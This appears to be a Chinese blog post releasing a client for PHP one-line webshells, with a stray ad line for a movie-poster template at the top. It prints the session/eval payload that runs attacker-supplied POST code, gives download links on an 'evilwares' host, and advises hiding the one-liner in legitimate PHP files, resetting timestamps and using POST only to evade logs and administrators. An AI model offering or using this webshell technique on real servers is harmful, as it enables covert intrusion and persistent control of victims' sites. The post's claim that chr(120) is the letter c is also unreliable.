零魂PHP一句話木馬客戶端(一鍵提交版)

《后會無期》電影海報PPT設計教程模板

• 類型：商務模板大?。?i>5.0M語言：中文 評分：10.0
• 標簽：

立即下載

-----------------------------
1.修補了下原始版本有些服務器不能正常運行的大Bug。
2.去掉了提交后的登陸密碼驗證，提交后直接進入大馬界面。
-----------------------------
更新說明:
-----------------------------
這玩意本來就是為了方便自己做的，所以本來只打算對自己負責，呵呵。好馬好工具如果傳出來必然被傳爛掉，但這東西無所謂，又不是多特別的東西，但有時候用著比較方便，所以發出來也無妨。

但是發出來后有朋友告訴我有些服務器上運行沒成功，心里頓覺愧疚，發個小東西出來，結果功能還有問題，豈不是欺騙大眾。但是一直在忙，除了當時做的 時候之外，幾乎再沒去測試過。昨晚hiphop兄給我說他那有臺服務器用不起，本來打算讓他發Shell來我正好測試下具體原因，結果他說他已經測試了并 告訴是magic_quotes_gpc的原因(是個低級錯誤...)，得謝謝他。
然后花了個把小時詳細測試并修改了下

相關關鍵代碼:

session_start();$_SESSION[chr(99)]=get_magic_quotes_gpc()?stripslashes($_POST[chr(100)]):$_POST[chr(100)];eval($_SESSION[chr(99)]);
-----------------------------
現在的版本magic_quotes_gpc On和Off都測試OK，不過不知道還有沒有其它會造成不正常的因素，實在懶的自己去一個一個測試了，等遇到了再說吧，也歡迎大家反饋。
-----------------------------
下載:
http://evilwares.appspot.com/down/zerosoul_PHP_eval_Client_v0.2.rar

在線使用:
http://evilwares.appspot.com/static/eval.html
--------------------
前天通宵到后半夜的時候，總覺得自己最近都沒干什么實事，覺得有點虛度的味道，心中不免有些自責。為了寬慰自己，決定做點正事。然后就啥都沒干，坐著干想該做什么。一直想到快天亮，總算想出點東西來了(- -!)，也就是現在發布的這個東西。
海洋頂端有個一鍵提交版的ASP一句話客戶端，很方便，一次提交之后，一句話就可以當大馬用了。用這種客戶端的話，留一句話的shell也就麻煩不到哪去了，而且把一句話藏在正常文件里面，再把時間改回正常，訪問只用POST的話，基本是很難發現的。
但是PHP一句話一直沒有見這樣的客戶端(不知道是不是我孤弱寡聞)，網上居然還有轉載的到處都是的工具，結果下載下來不能用.....
比較喜歡一句話的一鍵提交這種形式，所以花了2 x 半個通宵的時間做了這個東西，思路參考的是海洋，客戶端的CSS也是修改它的，呵呵。
注意:
由于一鍵提交版的特殊性，暫時是不能隨心所欲的換密碼的，這個客戶端的密碼是字母c。(海洋的也是這樣)。這個問題并不是不能解決，但是比較麻煩，所以還不如就用這密碼呢，呵呵。
特點:
1.填好一句話WebShell地址和密碼并點提交之后，后續操作不用再依賴客戶端，基本上剩下的和操作大馬沒什么兩樣。
2.完全POST提交，避免了WebServer記錄敏感數據。如果一句話插在有正常用戶訪問的PHP文件的話，插完時間也改回來了，那么管理員發現的概率就相當低了。(海洋的不是全POST)
大概原理:
一鍵提交版的一句話客戶端連接成功之后，每次POST數據的時候, 假設一句話密碼是c，都要先讓本地表單:
c = session_start();eval($_SESSION[chr(120)]);
chr(120)就是字母c，為了避免單引號寫成chr(120)形式。
然后一句話在eval($_POST[c])的時候，才能執行保存在Session中的我們的PHP代碼。
想用其它密碼的朋友可以依據這個原理修改。
下載:
http://evilwares.appspot.com/down/zerosoul_PHP_eval_Client.rar